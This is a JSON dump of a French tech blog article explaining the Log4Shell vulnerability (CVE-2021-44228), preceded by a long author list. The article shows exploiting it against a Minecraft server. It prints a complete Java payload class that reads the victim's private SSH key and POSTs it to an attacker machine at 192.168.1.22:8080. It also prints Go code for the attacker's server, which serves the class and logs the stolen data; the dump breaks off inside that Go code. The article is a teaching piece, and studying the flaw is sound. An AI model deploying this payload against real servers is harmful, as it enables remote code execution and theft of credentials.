[{"data":1,"prerenderedAt":1408},["ShallowReactive",2],{"authors":3,"article-2022-03-24-comprendre-et-exploiter-la-faille-log4shell":331},[4,23,35,48,61,73,85,98,111,124,136,148,161,173,185,197,209,221,233,245,258,270,282,295,307,319],{"id":5,"title":6,"body":7,"description":11,"extension":14,"meta":15,"name":16,"navigation":17,"path":18,"readingTime":19,"seo":20,"stem":21,"__hash__":22},"authors\u002Fauthors\u002Falexandre-guillon.md","Software Engineer",{"type":8,"value":9,"toc":10},"minimark",[],{"title":11,"searchDepth":12,"depth":12,"links":13},"",2,[],"md",{},"Alexandre Guillon",true,"\u002Fauthors\u002Falexandre-guillon",1,{"title":6,"description":11},"authors\u002Falexandre-guillon","4tf48mjyjFNqItOHaulICbrjeCyMag1o6801uHeTz98",{"id":24,"title":6,"body":25,"description":11,"extension":14,"meta":29,"name":30,"navigation":17,"path":31,"readingTime":19,"seo":32,"stem":33,"__hash__":34},"authors\u002Fauthors\u002Falexis-ablain.md",{"type":8,"value":26,"toc":27},[],{"title":11,"searchDepth":12,"depth":12,"links":28},[],{},"Alexis Ablain","\u002Fauthors\u002Falexis-ablain",{"title":6,"description":11},"authors\u002Falexis-ablain","_SIAtB7f-39e5t3GiJof81NP47s6MGo2n4gaHkTy1uQ",{"id":36,"title":37,"body":38,"description":11,"extension":14,"meta":42,"name":43,"navigation":17,"path":44,"readingTime":19,"seo":45,"stem":46,"__hash__":47},"authors\u002Fauthors\u002Faxel-shaita.md","Engineering Manager",{"type":8,"value":39,"toc":40},[],{"title":11,"searchDepth":12,"depth":12,"links":41},[],{},"Axel Shaïta","\u002Fauthors\u002Faxel-shaita",{"title":37,"description":11},"authors\u002Faxel-shaita","fK0argUhsBkWLjpTAhY13oYLVzQthcEYkCEdtHWmIgE",{"id":49,"title":50,"body":51,"description":11,"extension":14,"meta":55,"name":56,"navigation":17,"path":57,"readingTime":19,"seo":58,"stem":59,"__hash__":60},"authors\u002Fauthors\u002Fbaptiste-faure.md","Head of Talent Acquisition",{"type":8,"value":52,"toc":53},[],{"title":11,"searchDepth":12,"depth":12,"links":54},[],{},"Baptiste Faure","\u002Fauthors\u002Fbaptiste-faure",{"title":50,"description":11},"authors\u002Fbaptiste-faure","ELisToYtcgHmgdVWZkCclTPV6exZtfyXqhpx1jjbJHs",{"id":62,"title":6,"body":63,"description":11,"extension":14,"meta":67,"name":68,"navigation":17,"path":69,"readingTime":19,"seo":70,"stem":71,"__hash__":72},"authors\u002Fauthors\u002Fbenjamin-bouillot.md",{"type":8,"value":64,"toc":65},[],{"title":11,"searchDepth":12,"depth":12,"links":66},[],{},"Benjamin Bouillot","\u002Fauthors\u002Fbenjamin-bouillot",{"title":6,"description":11},"authors\u002Fbenjamin-bouillot","tbhCFZyfTt7ZM5b5YgqQ2nhgnSTl8BweaQQryc87fHo",{"id":74,"title":37,"body":75,"description":11,"extension":14,"meta":79,"name":80,"navigation":17,"path":81,"readingTime":19,"seo":82,"stem":83,"__hash__":84},"authors\u002Fauthors\u002Fcedric-nicoloso.md",{"type":8,"value":76,"toc":77},[],{"title":11,"searchDepth":12,"depth":12,"links":78},[],{},"Cédric Nicoloso","\u002Fauthors\u002Fcedric-nicoloso",{"title":37,"description":11},"authors\u002Fcedric-nicoloso","ibSoh4VZYiWYTuLOnZTedaAfcnvet1Q9H7ogW0LgorY",{"id":86,"title":87,"body":88,"description":11,"extension":14,"meta":92,"name":93,"navigation":17,"path":94,"readingTime":19,"seo":95,"stem":96,"__hash__":97},"authors\u002Fauthors\u002Fdavid-touzet.md","Staff Engineer",{"type":8,"value":89,"toc":90},[],{"title":11,"searchDepth":12,"depth":12,"links":91},[],{},"David Touzet","\u002Fauthors\u002Fdavid-touzet",{"title":87,"description":11},"authors\u002Fdavid-touzet","dHWwnQxb1Ubt-WwXWEODGEo9AFoq1cJUhfg3kdnYSBM",{"id":99,"title":100,"body":101,"description":11,"extension":14,"meta":105,"name":106,"navigation":17,"path":107,"readingTime":19,"seo":108,"stem":109,"__hash__":110},"authors\u002Fauthors\u002Feloise-chizat.md","Data Engineer",{"type":8,"value":102,"toc":103},[],{"title":11,"searchDepth":12,"depth":12,"links":104},[],{},"Eloïse Chizat","\u002Fauthors\u002Feloise-chizat",{"title":100,"description":11},"authors\u002Feloise-chizat","Utd72Vm9qT4hh2ZbFi6a2_nXw5Wb494Ed_HL1ra5yw8",{"id":112,"title":113,"body":114,"description":11,"extension":14,"meta":118,"name":119,"navigation":17,"path":120,"readingTime":19,"seo":121,"stem":122,"__hash__":123},"authors\u002Fauthors\u002Femmanuel-auclair.md","Staff engineer",{"type":8,"value":115,"toc":116},[],{"title":11,"searchDepth":12,"depth":12,"links":117},[],{},"Emmanuel Auclair","\u002Fauthors\u002Femmanuel-auclair",{"title":113,"description":11},"authors\u002Femmanuel-auclair","MtsA8THNLEn0dTtYEIQaGwDuf7MjQL55IOeei5gugEg",{"id":125,"title":6,"body":126,"description":11,"extension":14,"meta":130,"name":131,"navigation":17,"path":132,"readingTime":19,"seo":133,"stem":134,"__hash__":135},"authors\u002Fauthors\u002Fhoreb-parraud.md",{"type":8,"value":127,"toc":128},[],{"title":11,"searchDepth":12,"depth":12,"links":129},[],{},"Horeb Parraud","\u002Fauthors\u002Fhoreb-parraud",{"title":6,"description":11},"authors\u002Fhoreb-parraud","ajjsnUX4ohZI-ghMdbb92q_taWDkKXVZSLZXoAeLQtg",{"id":137,"title":37,"body":138,"description":11,"extension":14,"meta":142,"name":143,"navigation":17,"path":144,"readingTime":19,"seo":145,"stem":146,"__hash__":147},"authors\u002Fauthors\u002Fhugo-contreras.md",{"type":8,"value":139,"toc":140},[],{"title":11,"searchDepth":12,"depth":12,"links":141},[],{},"Hugo Contreras","\u002Fauthors\u002Fhugo-contreras",{"title":37,"description":11},"authors\u002Fhugo-contreras","2nc3VMu9ASq9Z6Pwx2-7-Ye991Pww4p-UEDBQFfjF-Q",{"id":149,"title":150,"body":151,"description":11,"extension":14,"meta":155,"name":156,"navigation":17,"path":157,"readingTime":19,"seo":158,"stem":159,"__hash__":160},"authors\u002Fauthors\u002Fjulien-tassin.md","Head of Engineering",{"type":8,"value":152,"toc":153},[],{"title":11,"searchDepth":12,"depth":12,"links":154},[],{},"Julien Tassin","\u002Fauthors\u002Fjulien-tassin",{"title":150,"description":11},"authors\u002Fjulien-tassin","iUIHI7SITje38Jh9X9uvYs4-VsHx4eCdt6hAlyLFG_o",{"id":162,"title":6,"body":163,"description":11,"extension":14,"meta":167,"name":168,"navigation":17,"path":169,"readingTime":19,"seo":170,"stem":171,"__hash__":172},"authors\u002Fauthors\u002Flaurent-renard.md",{"type":8,"value":164,"toc":165},[],{"title":11,"searchDepth":12,"depth":12,"links":166},[],{},"Laurent Renard","\u002Fauthors\u002Flaurent-renard",{"title":6,"description":11},"authors\u002Flaurent-renard","5BP7Ed-pt1SQHjh0UJ1XUrlLTcdlFaDoKBCP4deHq8A",{"id":174,"title":6,"body":175,"description":11,"extension":14,"meta":179,"name":180,"navigation":17,"path":181,"readingTime":19,"seo":182,"stem":183,"__hash__":184},"authors\u002Fauthors\u002Fleo-martin.md",{"type":8,"value":176,"toc":177},[],{"title":11,"searchDepth":12,"depth":12,"links":178},[],{},"Léo Martin","\u002Fauthors\u002Fleo-martin",{"title":6,"description":11},"authors\u002Fleo-martin","eYxCHkRgbGDV7shKdTA9s7Tu0zGV4yDGFoKR5MHQntY",{"id":186,"title":6,"body":187,"description":11,"extension":14,"meta":191,"name":192,"navigation":17,"path":193,"readingTime":19,"seo":194,"stem":195,"__hash__":196},"authors\u002Fauthors\u002Floic-bousquet.md",{"type":8,"value":188,"toc":189},[],{"title":11,"searchDepth":12,"depth":12,"links":190},[],{},"Loïc Bousquet","\u002Fauthors\u002Floic-bousquet",{"title":6,"description":11},"authors\u002Floic-bousquet","ko12qZwiGL8XNjAoy9oWypPkIjr29Pbq7vhdtgldqeQ",{"id":198,"title":6,"body":199,"description":11,"extension":14,"meta":203,"name":204,"navigation":17,"path":205,"readingTime":19,"seo":206,"stem":207,"__hash__":208},"authors\u002Fauthors\u002Floic-poullain.md",{"type":8,"value":200,"toc":201},[],{"title":11,"searchDepth":12,"depth":12,"links":202},[],{},"Loïc Poullain","\u002Fauthors\u002Floic-poullain",{"title":6,"description":11},"authors\u002Floic-poullain","oRIyJhFRTqxy5dLCYQ2OnYZ1DB-gLDUM-85vTSYuTF0",{"id":210,"title":100,"body":211,"description":11,"extension":14,"meta":215,"name":216,"navigation":17,"path":217,"readingTime":19,"seo":218,"stem":219,"__hash__":220},"authors\u002Fauthors\u002Fmaud-lelu.md",{"type":8,"value":212,"toc":213},[],{"title":11,"searchDepth":12,"depth":12,"links":214},[],{},"Maud Lélu","\u002Fauthors\u002Fmaud-lelu",{"title":100,"description":11},"authors\u002Fmaud-lelu","MMbsCKuE41OMHusrl12FIEsI-Trx7l8Nn_ANhvj2_y4",{"id":222,"title":37,"body":223,"description":11,"extension":14,"meta":227,"name":228,"navigation":17,"path":229,"readingTime":19,"seo":230,"stem":231,"__hash__":232},"authors\u002Fauthors\u002Fnicolas-poirier.md",{"type":8,"value":224,"toc":225},[],{"title":11,"searchDepth":12,"depth":12,"links":226},[],{},"Nicolas Poirier","\u002Fauthors\u002Fnicolas-poirier",{"title":37,"description":11},"authors\u002Fnicolas-poirier","dXrJkYo8az4SN_D23aYc3fQ7z8s1dR2a0lt1ogjAjJs",{"id":234,"title":37,"body":235,"description":11,"extension":14,"meta":239,"name":240,"navigation":17,"path":241,"readingTime":19,"seo":242,"stem":243,"__hash__":244},"authors\u002Fauthors\u002Fraphael-sauget.md",{"type":8,"value":236,"toc":237},[],{"title":11,"searchDepth":12,"depth":12,"links":238},[],{},"Raphaël Sauget","\u002Fauthors\u002Fraphael-sauget",{"title":37,"description":11},"authors\u002Fraphael-sauget","Uri9bcq0QDuxRA0PbBoNtu7p_5L3dALu4kzcXVW0xyM",{"id":246,"title":247,"body":248,"description":11,"extension":14,"meta":252,"name":253,"navigation":17,"path":254,"readingTime":19,"seo":255,"stem":256,"__hash__":257},"authors\u002Fauthors\u002Fromain-koenig.md","Co-funder & Head of innovation",{"type":8,"value":249,"toc":250},[],{"title":11,"searchDepth":12,"depth":12,"links":251},[],{},"Romain Koenig","\u002Fauthors\u002Fromain-koenig",{"title":247,"description":11},"authors\u002Fromain-koenig","uyS8--eG2_ezyqRABcJnMJmQKKuSArhPWd14aUvFeEw",{"id":259,"title":37,"body":260,"description":11,"extension":14,"meta":264,"name":265,"navigation":17,"path":266,"readingTime":19,"seo":267,"stem":268,"__hash__":269},"authors\u002Fauthors\u002Fromaric-juniet.md",{"type":8,"value":261,"toc":262},[],{"title":11,"searchDepth":12,"depth":12,"links":263},[],{},"Romaric Juniet","\u002Fauthors\u002Fromaric-juniet",{"title":37,"description":11},"authors\u002Fromaric-juniet","4Zb2artgT-eo-PHLXi3xi4d5t7s6PfhUxeSfXIikSUY",{"id":271,"title":6,"body":272,"description":11,"extension":14,"meta":276,"name":277,"navigation":17,"path":278,"readingTime":19,"seo":279,"stem":280,"__hash__":281},"authors\u002Fauthors\u002Fstanyslas-bres.md",{"type":8,"value":273,"toc":274},[],{"title":11,"searchDepth":12,"depth":12,"links":275},[],{},"Stanyslas Bres","\u002Fauthors\u002Fstanyslas-bres",{"title":6,"description":11},"authors\u002Fstanyslas-bres","Xa0SahETuiN4q1jrmR2ych3moAqcZ2LbU7vSfEt2RuU",{"id":283,"title":284,"body":285,"description":11,"extension":14,"meta":289,"name":290,"navigation":17,"path":291,"readingTime":19,"seo":292,"stem":293,"__hash__":294},"authors\u002Fauthors\u002Ftalent-acquisition.md","Talent Acquisition",{"type":8,"value":286,"toc":287},[],{"title":11,"searchDepth":12,"depth":12,"links":288},[],{},"Équipe Talent Acquisition","\u002Fauthors\u002Ftalent-acquisition",{"description":11},"authors\u002Ftalent-acquisition","doDfE76txftQ4wIiKjJoDmSpyzSKk0tzlgVAp6-opAY",{"id":296,"title":6,"body":297,"description":11,"extension":14,"meta":301,"name":302,"navigation":17,"path":303,"readingTime":19,"seo":304,"stem":305,"__hash__":306},"authors\u002Fauthors\u002Fvictor-borg.md",{"type":8,"value":298,"toc":299},[],{"title":11,"searchDepth":12,"depth":12,"links":300},[],{},"Victor Borg","\u002Fauthors\u002Fvictor-borg",{"title":6,"description":11},"authors\u002Fvictor-borg","-Za-JweoiP6hyclue_WkxMXdRUDTczPGlJf6AZckjUc",{"id":308,"title":6,"body":309,"description":11,"extension":14,"meta":313,"name":314,"navigation":17,"path":315,"readingTime":19,"seo":316,"stem":317,"__hash__":318},"authors\u002Fauthors\u002Fvirgil-roger.md",{"type":8,"value":310,"toc":311},[],{"title":11,"searchDepth":12,"depth":12,"links":312},[],{},"Virgil Roger","\u002Fauthors\u002Fvirgil-roger",{"title":6,"description":11},"authors\u002Fvirgil-roger","DfVFe5j0bCgXeEr381ZYOM5DP4m-pWb93J9-m_muKJ0",{"id":320,"title":6,"body":321,"description":11,"extension":14,"meta":325,"name":326,"navigation":17,"path":327,"readingTime":19,"seo":328,"stem":329,"__hash__":330},"authors\u002Fauthors\u002Fyukan-zhao.md",{"type":8,"value":322,"toc":323},[],{"title":11,"searchDepth":12,"depth":12,"links":324},[],{},"Yukan Zhao","\u002Fauthors\u002Fyukan-zhao",{"title":6,"description":11},"authors\u002Fyukan-zhao","LRPHugtAJnWHsmHxy9_SR5Zas_C5p-GR_uHEs1Fhk_E",{"id":332,"title":333,"author":334,"body":335,"date":1398,"description":1399,"extension":14,"lang":1400,"meta":1401,"navigation":17,"path":1402,"published":17,"readingTime":436,"seo":1403,"stem":1404,"tags":1405,"__hash__":1407},"articles\u002Farticles\u002F2022-03-24-comprendre-et-exploiter-la-faille-log4shell.md","Comprendre (et exploiter 😈) la faille log4shell","loic-bousquet",{"type":8,"value":336,"toc":1393},[337,342,346,350,353,361,365,368,374,377,380,385,388,391,970,981,986,993,1273,1276,1303,1313,1321,1324,1329,1332,1337,1342,1348,1353,1356,1359,1365,1371,1377,1383,1389],[338,339,341],"h2",{"id":340},"log4j-quest-ce-que-cest","Log4j, qu’est-ce que c’est ?",[343,344,345],"p",{},"Log4j est une des librairies de log parmi les plus utilisées par les applications codées en java. La\nliste des entreprises qui l’utilise est longue, on y compte notamment des géants comme Apple,\nGoogle, Microsoft ou encore Steam.",[338,347,349],{"id":348},"la-faille-log4shell","La faille Log4Shell",[343,351,352],{},"Log4shell c’est le nom donné à cette vulnérabilité. On peut aussi la retrouver sous le nom\nCVE-2021-44228. Ce qui rend cette faille très dangereuse est que d’une part elle est très facile à\nexploiter et d’autre part,la librairie log4j est utilisée dans un grand nombre de projets. Sur\ngithub plus de 300 000 dépôts utilisent cette dépendance.",[343,354,355,356,360],{},"Log4j comprend une fonctionnalité de lookup. C’est à dire qu’elle peut interpréter certaines\ninstructions qui seraient inclues dans les données loggées. Par exemple si on lui demande de logger\n",[357,358,359],"code",{},"${env:USER}",", cette chaîne de caractères va automatiquement remplacée par la valeur de la variable\nd’environnement USER. Il est ainsi possible de faire un lookup via jndi (java naming directory\ninterface), qui en soit n’est pas problématique, on va juste chercher une valeur ailleurs et la\nlogger. Quand on la combine a ldap (un annuaire clé valeur) il devient possible de faire exécuter du\ncode. Pour comprendre comment cela marche, on a va passer à la pratique dans la partie suivante.",[338,362,364],{"id":363},"exploitons-cette-faille","Exploitons cette faille",[343,366,367],{},"Passons maintenant aux travaux pratiques. Pour réaliser une attaque, on va utiliser deux\nordinateurs. Le premier sera l’ordinateur cible, qui fera tourner le serveur, le second (à l’adresse\n192.168.1.22) sera l’ordinateur attaquant qui va héberger le serveur http et jdni.",[343,369,370],{},[371,372],"img",{"alt":11,"src":373},"\u002Fimages\u002Fbonjour-console-jeu.png",[343,375,376],{},"Chaque message envoyé dans le tchat du jeu (à gauche) est loggé dans la console du serveur et dans\nun fichier de logs (à droite)",[343,378,379],{},"Pour commencer, on lance le serveur minecraft avec la commande suivante :",[343,381,382],{},[357,383,384],{},"java -Xmx1024M -Xms1024M -jar .\\\\server.jar nogui",[343,386,387],{},"On va ensuite avoir besoin d’un code java malicieux qui sera exécuté sur la machine qui héberge le\nserveur minecraft. Dans cet exemple on va lire la clé privée de l’utilisateur et l’envoyer à un\nserveur distant via http.",[343,389,390],{},"Voici le code qui fait ça :",[392,393,397],"pre",{"className":394,"code":395,"language":396,"meta":11,"style":11},"language-java shiki shiki-themes github-light github-dark","import java.io.OutputStream;\nimport java.net.HttpURLConnection;\nimport java.net.URL;\nimport java.net.URLConnection;\nimport java.nio.charset.StandardCharsets;\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\npublic class MinecraftRCE {\n    static {\n        try {\n            URL url = new URL(\"\u003Chttp:\u002F\u002F192.168.1.22:8080\u002Fdata>\");\n            URLConnection con = url.openConnection();\n            HttpURLConnection http = (HttpURLConnection) con;\n            http.setRequestMethod(\"POST\");\n\n            StringBuilder sb = new StringBuilder();\n\n            try (BufferedReader br = Files.newBufferedReader(Paths.get(System.getProperty(\"user.home\") + \"\u002F.ssh\u002Fid_rsa\"))) {\n                String line;\n                while ((line = br.readLine()) != null) {\n                    sb.append(line).append(\"\\\\n\");\n                }\n\n            } catch (IOException e) {\n                System.err.format(\"IOException: %s%n\", e);\n            }\n\n            byte[] out = sb.toString().getBytes(StandardCharsets.UTF_8);\n\n            int length = out.length;\n\n            http.setFixedLengthStreamingMode(length);\n            http.setRequestProperty(\"Content-Type\", \"application\u002Fx-www-form-urlencoded; charset=UTF-8\");\n            http.setDoOutput(true);\n            http.connect();\n            try(OutputStream os = http.getOutputStream()) {\n                os.write(out);\n            }\n            http.disconnect();\n        } catch (Exception e){\n            e.printStackTrace();\n        }\n    }\n}\n","java",[357,398,399,411,418,426,434,442,450,458,466,474,480,496,504,512,537,554,565,581,586,601,606,652,658,688,715,721,726,744,761,767,772,798,803,817,822,833,854,869,879,898,910,915,925,941,952,958,964],{"__ignoreMap":11},[400,401,403,407],"span",{"class":402,"line":19},"line",[400,404,406],{"class":405},"szBVR","import",[400,408,410],{"class":409},"sVt8B"," java.io.OutputStream;\n",[400,412,413,415],{"class":402,"line":12},[400,414,406],{"class":405},[400,416,417],{"class":409}," java.net.HttpURLConnection;\n",[400,419,421,423],{"class":402,"line":420},3,[400,422,406],{"class":405},[400,424,425],{"class":409}," java.net.URL;\n",[400,427,429,431],{"class":402,"line":428},4,[400,430,406],{"class":405},[400,432,433],{"class":409}," java.net.URLConnection;\n",[400,435,437,439],{"class":402,"line":436},5,[400,438,406],{"class":405},[400,440,441],{"class":409}," java.nio.charset.StandardCharsets;\n",[400,443,445,447],{"class":402,"line":444},6,[400,446,406],{"class":405},[400,448,449],{"class":409}," java.io.BufferedReader;\n",[400,451,453,455],{"class":402,"line":452},7,[400,454,406],{"class":405},[400,456,457],{"class":409}," java.io.IOException;\n",[400,459,461,463],{"class":402,"line":460},8,[400,462,406],{"class":405},[400,464,465],{"class":409}," java.nio.file.Files;\n",[400,467,469,471],{"class":402,"line":468},9,[400,470,406],{"class":405},[400,472,473],{"class":409}," java.nio.file.Paths;\n",[400,475,477],{"class":402,"line":476},10,[400,478,479],{"emptyLinePlaceholder":17},"\n",[400,481,483,486,489,493],{"class":402,"line":482},11,[400,484,485],{"class":405},"public",[400,487,488],{"class":405}," class",[400,490,492],{"class":491},"sScJk"," MinecraftRCE",[400,494,495],{"class":409}," {\n",[400,497,499,502],{"class":402,"line":498},12,[400,500,501],{"class":405},"    static",[400,503,495],{"class":409},[400,505,507,510],{"class":402,"line":506},13,[400,508,509],{"class":405},"        try",[400,511,495],{"class":409},[400,513,515,518,521,524,527,530,534],{"class":402,"line":514},14,[400,516,517],{"class":409},"            URL url ",[400,519,520],{"class":405},"=",[400,522,523],{"class":405}," new",[400,525,526],{"class":491}," URL",[400,528,529],{"class":409},"(",[400,531,533],{"class":532},"sZZnC","\"\u003Chttp:\u002F\u002F192.168.1.22:8080\u002Fdata>\"",[400,535,536],{"class":409},");\n",[400,538,540,543,545,548,551],{"class":402,"line":539},15,[400,541,542],{"class":409},"            URLConnection con ",[400,544,520],{"class":405},[400,546,547],{"class":409}," url.",[400,549,550],{"class":491},"openConnection",[400,552,553],{"class":409},"();\n",[400,555,557,560,562],{"class":402,"line":556},16,[400,558,559],{"class":409},"            HttpURLConnection http ",[400,561,520],{"class":405},[400,563,564],{"class":409}," (HttpURLConnection) con;\n",[400,566,568,571,574,576,579],{"class":402,"line":567},17,[400,569,570],{"class":409},"            http.",[400,572,573],{"class":491},"setRequestMethod",[400,575,529],{"class":409},[400,577,578],{"class":532},"\"POST\"",[400,580,536],{"class":409},[400,582,584],{"class":402,"line":583},18,[400,585,479],{"emptyLinePlaceholder":17},[400,587,589,592,594,596,599],{"class":402,"line":588},19,[400,590,591],{"class":409},"            StringBuilder sb ",[400,593,520],{"class":405},[400,595,523],{"class":405},[400,597,598],{"class":491}," StringBuilder",[400,600,553],{"class":409},[400,602,604],{"class":402,"line":603},20,[400,605,479],{"emptyLinePlaceholder":17},[400,607,609,612,615,617,620,623,626,629,632,635,637,640,643,646,649],{"class":402,"line":608},21,[400,610,611],{"class":405},"            try",[400,613,614],{"class":409}," (BufferedReader br ",[400,616,520],{"class":405},[400,618,619],{"class":409}," Files.",[400,621,622],{"class":491},"newBufferedReader",[400,624,625],{"class":409},"(Paths.",[400,627,628],{"class":491},"get",[400,630,631],{"class":409},"(System.",[400,633,634],{"class":491},"getProperty",[400,636,529],{"class":409},[400,638,639],{"class":532},"\"user.home\"",[400,641,642],{"class":409},") ",[400,644,645],{"class":405},"+",[400,647,648],{"class":532}," \"\u002F.ssh\u002Fid_rsa\"",[400,650,651],{"class":409},"))) {\n",[400,653,655],{"class":402,"line":654},22,[400,656,657],{"class":409},"                String line;\n",[400,659,661,664,667,669,672,675,678,681,685],{"class":402,"line":660},23,[400,662,663],{"class":405},"                while",[400,665,666],{"class":409}," ((line ",[400,668,520],{"class":405},[400,670,671],{"class":409}," br.",[400,673,674],{"class":491},"readLine",[400,676,677],{"class":409},"()) ",[400,679,680],{"class":405},"!=",[400,682,684],{"class":683},"sj4cs"," null",[400,686,687],{"class":409},") {\n",[400,689,691,694,697,700,702,704,707,710,713],{"class":402,"line":690},24,[400,692,693],{"class":409},"                    sb.",[400,695,696],{"class":491},"append",[400,698,699],{"class":409},"(line).",[400,701,696],{"class":491},[400,703,529],{"class":409},[400,705,706],{"class":532},"\"",[400,708,709],{"class":683},"\\\\",[400,711,712],{"class":532},"n\"",[400,714,536],{"class":409},[400,716,718],{"class":402,"line":717},25,[400,719,720],{"class":409},"                }\n",[400,722,724],{"class":402,"line":723},26,[400,725,479],{"emptyLinePlaceholder":17},[400,727,729,732,735,738,742],{"class":402,"line":728},27,[400,730,731],{"class":409},"            } ",[400,733,734],{"class":405},"catch",[400,736,737],{"class":409}," (IOException ",[400,739,741],{"class":740},"s4XuR","e",[400,743,687],{"class":409},[400,745,747,750,753,755,758],{"class":402,"line":746},28,[400,748,749],{"class":409},"                System.err.",[400,751,752],{"class":491},"format",[400,754,529],{"class":409},[400,756,757],{"class":532},"\"IOException: %s%n\"",[400,759,760],{"class":409},", e);\n",[400,762,764],{"class":402,"line":763},29,[400,765,766],{"class":409},"            }\n",[400,768,770],{"class":402,"line":769},30,[400,771,479],{"emptyLinePlaceholder":17},[400,773,775,778,781,783,786,789,792,795],{"class":402,"line":774},31,[400,776,777],{"class":405},"            byte",[400,779,780],{"class":409},"[] out ",[400,782,520],{"class":405},[400,784,785],{"class":409}," sb.",[400,787,788],{"class":491},"toString",[400,790,791],{"class":409},"().",[400,793,794],{"class":491},"getBytes",[400,796,797],{"class":409},"(StandardCharsets.UTF_8);\n",[400,799,801],{"class":402,"line":800},32,[400,802,479],{"emptyLinePlaceholder":17},[400,804,806,809,812,814],{"class":402,"line":805},33,[400,807,808],{"class":405},"            int",[400,810,811],{"class":409}," length ",[400,813,520],{"class":405},[400,815,816],{"class":409}," out.length;\n",[400,818,820],{"class":402,"line":819},34,[400,821,479],{"emptyLinePlaceholder":17},[400,823,825,827,830],{"class":402,"line":824},35,[400,826,570],{"class":409},[400,828,829],{"class":491},"setFixedLengthStreamingMode",[400,831,832],{"class":409},"(length);\n",[400,834,836,838,841,843,846,849,852],{"class":402,"line":835},36,[400,837,570],{"class":409},[400,839,840],{"class":491},"setRequestProperty",[400,842,529],{"class":409},[400,844,845],{"class":532},"\"Content-Type\"",[400,847,848],{"class":409},", ",[400,850,851],{"class":532},"\"application\u002Fx-www-form-urlencoded; charset=UTF-8\"",[400,853,536],{"class":409},[400,855,857,859,862,864,867],{"class":402,"line":856},37,[400,858,570],{"class":409},[400,860,861],{"class":491},"setDoOutput",[400,863,529],{"class":409},[400,865,866],{"class":683},"true",[400,868,536],{"class":409},[400,870,872,874,877],{"class":402,"line":871},38,[400,873,570],{"class":409},[400,875,876],{"class":491},"connect",[400,878,553],{"class":409},[400,880,882,884,887,889,892,895],{"class":402,"line":881},39,[400,883,611],{"class":405},[400,885,886],{"class":409},"(OutputStream os ",[400,888,520],{"class":405},[400,890,891],{"class":409}," http.",[400,893,894],{"class":491},"getOutputStream",[400,896,897],{"class":409},"()) {\n",[400,899,901,904,907],{"class":402,"line":900},40,[400,902,903],{"class":409},"                os.",[400,905,906],{"class":491},"write",[400,908,909],{"class":409},"(out);\n",[400,911,913],{"class":402,"line":912},41,[400,914,766],{"class":409},[400,916,918,920,923],{"class":402,"line":917},42,[400,919,570],{"class":409},[400,921,922],{"class":491},"disconnect",[400,924,553],{"class":409},[400,926,928,931,933,936,938],{"class":402,"line":927},43,[400,929,930],{"class":409},"        } ",[400,932,734],{"class":405},[400,934,935],{"class":409}," (Exception ",[400,937,741],{"class":740},[400,939,940],{"class":409},"){\n",[400,942,944,947,950],{"class":402,"line":943},44,[400,945,946],{"class":409},"            e.",[400,948,949],{"class":491},"printStackTrace",[400,951,553],{"class":409},[400,953,955],{"class":402,"line":954},45,[400,956,957],{"class":409},"        }\n",[400,959,961],{"class":402,"line":960},46,[400,962,963],{"class":409},"    }\n",[400,965,967],{"class":402,"line":966},47,[400,968,969],{"class":409},"}\n",[343,971,972,973,976,977,980],{},"On compile ce bout de code avec ",[357,974,975],{},"javac"," pour obtenir un fichier ",[357,978,979],{},"MinecraftRCE.class"," :",[343,982,983],{},[357,984,985],{},"javac MinecraftRCE.java",[343,987,988,989,992],{},"La prochaine étape est de servir ce fichier ",[357,990,991],{},".class"," sur un endpoint http. Plusieurs options pour\nréaliser cela, nous allons partir sur une implémentation en Go, car on peut facilement lancer un\nserveur http avec la librairie standard :",[392,994,996],{"className":394,"code":995,"language":396,"meta":11,"style":11},"package main\n\nimport (\n    \"bytes\"\n    \"io\u002Fioutil\"\n    \"log\"\n    \"net\u002Fhttp\"\n)\n\nfunc dataHandler(_ http.ResponseWriter, req *http.Request) {\n    buf, _ := ioutil.ReadAll(req.Body)\n    rdr1 := ioutil.NopCloser(bytes.NewBuffer(buf))\n    log.Printf(\"secret data: %q\", rdr1)\n}\n\nfunc main() {\n    fs := http.FileServer(http.Dir(\".\u002Fjava\"))\n    http.Handle(\"\u002Fstatic\u002F\", http.StripPrefix(\"\u002Fstatic\u002F\", fs)) \u002F\u002F 1\n    http.HandleFunc(\"\u002Fdata\", dataHandler) \u002F\u002F 2\n\n    println(\"waiting for secret data\")\n    http.ListenAndServe(\":8080\", nil)\n}\n",[357,997,998,1006,1010,1018,1023,1028,1033,1038,1043,1047,1075,1097,1124,1135,1139,1143,1148,1171,1206,1228,1232,1243,1269],{"__ignoreMap":11},[400,999,1000,1003],{"class":402,"line":19},[400,1001,1002],{"class":405},"package",[400,1004,1005],{"class":409}," main\n",[400,1007,1008],{"class":402,"line":12},[400,1009,479],{"emptyLinePlaceholder":17},[400,1011,1012,1015],{"class":402,"line":420},[400,1013,406],{"class":1014},"s7hpK",[400,1016,1017],{"class":409}," (\n",[400,1019,1020],{"class":402,"line":428},[400,1021,1022],{"class":409},"    \"bytes\"\n",[400,1024,1025],{"class":402,"line":436},[400,1026,1027],{"class":409},"    \"io\u002Fioutil\"\n",[400,1029,1030],{"class":402,"line":444},[400,1031,1032],{"class":409},"    \"log\"\n",[400,1034,1035],{"class":402,"line":452},[400,1036,1037],{"class":409},"    \"net\u002Fhttp\"\n",[400,1039,1040],{"class":402,"line":460},[400,1041,1042],{"class":409},")\n",[400,1044,1045],{"class":402,"line":468},[400,1046,479],{"emptyLinePlaceholder":17},[400,1048,1049,1052,1055,1058,1061,1064,1067,1070,1072],{"class":402,"line":476},[400,1050,1051],{"class":409},"func data",[400,1053,1054],{"class":1014},"H",[400,1056,1057],{"class":409},"andler(_ http.",[400,1059,1060],{"class":1014},"R",[400,1062,1063],{"class":409},"esponse",[400,1065,1066],{"class":1014},"W",[400,1068,1069],{"class":409},"riter, req *http.",[400,1071,1060],{"class":1014},[400,1073,1074],{"class":409},"equest) {\n",[400,1076,1077,1080,1082,1085,1088,1091,1094],{"class":402,"line":482},[400,1078,1079],{"class":409},"    buf, _ := ioutil.",[400,1081,1060],{"class":1014},[400,1083,1084],{"class":409},"ead",[400,1086,1087],{"class":1014},"A",[400,1089,1090],{"class":409},"ll(req.",[400,1092,1093],{"class":1014},"B",[400,1095,1096],{"class":409},"ody)\n",[400,1098,1099,1102,1105,1108,1111,1114,1116,1119,1121],{"class":402,"line":498},[400,1100,1101],{"class":409},"    rdr1 := 